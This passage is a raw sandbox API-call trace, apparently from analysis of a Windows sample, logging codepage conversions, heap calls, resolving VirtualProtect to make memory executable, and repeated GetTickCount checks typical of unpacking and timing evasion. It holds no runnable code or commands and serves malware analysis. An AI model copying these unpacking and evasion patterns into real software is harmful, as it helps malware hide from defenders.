¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\ᛝ뇳㡰ö䀌␕∀, cchSrc=256, lpDestStr=0x2417a0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\⯝냳㡌⋶) returned 256 [0048.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\⯝냳㡌⋶, cchWideChar=256, lpMultiByteStr=0x18fb34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0048.024] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241778) returned 1 [0048.024] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x241778 | out: hHeap=0x240000) returned 1 [0048.024] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241540) returned 1 [0048.025] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x241540 | out: hHeap=0x240000) returned 1 [0048.025] GetLastError () returned 0x0 [0048.025] SetLastError (dwErrCode=0x0) [0048.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0048.025] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x22c) returned 0x241540 [0048.025] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x241568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\郝냳㣷⋶) returned 256 [0048.025] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\郝냳㣷⋶, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0048.025] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x22c) returned 0x241778 [0048.025] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\ᛝ뇳㡰ö䀌␕∀, cchSrc=256, lpDestStr=0x2417a0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\⯝냳㡌⋶) returned 256 [0048.025] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\⯝냳㡌⋶, cchWideChar=256, lpMultiByteStr=0x18fa34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0048.025] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241778) returned 1 [0048.025] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x241778 | out: hHeap=0x240000) returned 1 [0048.026] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241540) returned 1 [0048.026] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x241540 | out: hHeap=0x240000) returned 1 [0048.026] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x824) returned 0x241540 [0048.026] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.027] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x430c10) returned 0x0 [0048.027] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.028] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.028] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.028] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.029] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.029] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.029] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.030] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.030] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.030] GetLastError () returned 0x0 [0048.030] GetLastError () returned 0x0 [0048.030] GetLastError () returned 0x0 [0048.030] GetLastError () returned 0x0 [0048.030] GetLastError () returned 0x0 [0048.030] GetLastError () returned 0x0 [0048.030] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.031] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.032] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.033] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.034] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.043] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.044] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.045] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0048.046] GetLastError () returned 0x0 [0049.636] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0049.638] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0049.638] VirtualProtect (in: lpAddress=0x91f3d0, dwSize=0xf520, flNewProtect=0x40, lpflOldProtect=0x18dc9c | out: lpflOldProtect=0x18dc9c*=0x4) returned 1 [0049.649] GetTickCount () returned 0xf6dece [0049.649] SetLastError (dwErrCode=0x0) [0049.649] GetTickCount () returned 0xf6dece [0049.649] SetLastError (dwErrCode=0x0) [0049.649] GetTickCount () returned 0xf6dece [0049.649] SetLastError (dwErrCode=0x0) [0049.649] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.650] GetTickCount () returned 0xf6dece [0049.650] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.651] SetLastError (dwErrCode=0x0) [0049.651] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.652] GetTickCount () returned 0xf6dece [0049.652] SetLastError (dwErrCode=0x0) [0049.653] GetTickCount () returned 0xf6dece [0049.653] SetLastError 